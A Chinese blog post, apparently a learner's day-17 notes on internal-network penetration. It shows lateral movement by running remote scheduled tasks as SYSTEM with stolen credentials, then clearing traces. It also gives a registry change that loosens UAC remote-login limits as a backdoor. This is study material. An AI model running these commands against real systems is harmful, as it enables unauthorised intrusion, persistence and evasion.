系统相关
首页 > 系统相关> > 记录内网渗透学习进程--DAY17

记录内网渗透学习进程--DAY17

作者:互联网

IPC+计划任务进⾏横向移动2 schtasks远程命令执⾏ 使⽤条件:启动Task Scheduler服务,获取目标的明文密码 至于怎么拿到目标的明文密码呢,SMB爆破和密码嗅探   在⽬标系统启动的时候以system运⾏命令
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc onstart /tr "cmd.exe /c whoami" /ru system /f

 

 


在⽬标系统建⽴⼀个任务,等待攻击者启动
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc DAILY /tr "cmd.exe /c whoami>c:\rules.log" /ru system /f
启动⽬标系统的test任务
schtasks /run /s <target ip> /u workgroup\administrator /p "<password>" /tn "test" /i

 

 

  在⽬标系统启动的时候以system运⾏脚本
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc onstart /tr c:\programdata\test.bat /ru system /f   查看⽬标建⽴的计划任务是否正确
schtasks /query /s <target ip> /u workgroup\administrator /p "<password>" | findstr test   删除⽬标已经建⽴的计划任务
schtasks /delete /s<target ip>  /u workgroup\administrator /p "<password>" /tn "test" /f   #用完一定要清理痕迹   问题点:
1.win7/win2008开始的uac导致⾮rid为500的都不能连 如果我们获取到了目标的权限后,可以在注册表上留下后面,方便我们日后再次连接
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
添加之后,我们是只可以make_token 明⽂,然后ls成功,测试⽬标机器是:win7,但是使⽤hash注⼊的话是不影响的。  
2.win7/win2008开始的禁⽌at命令 (make_token之后,直接使⽤schtasks而不⽤密码可⾏否?hash注⼊之后呢?)            

标签:administrator,schtasks,workgroup,--,system,tn,渗透,DAY17,test
来源: https://www.cnblogs.com/paku/p/14729995.html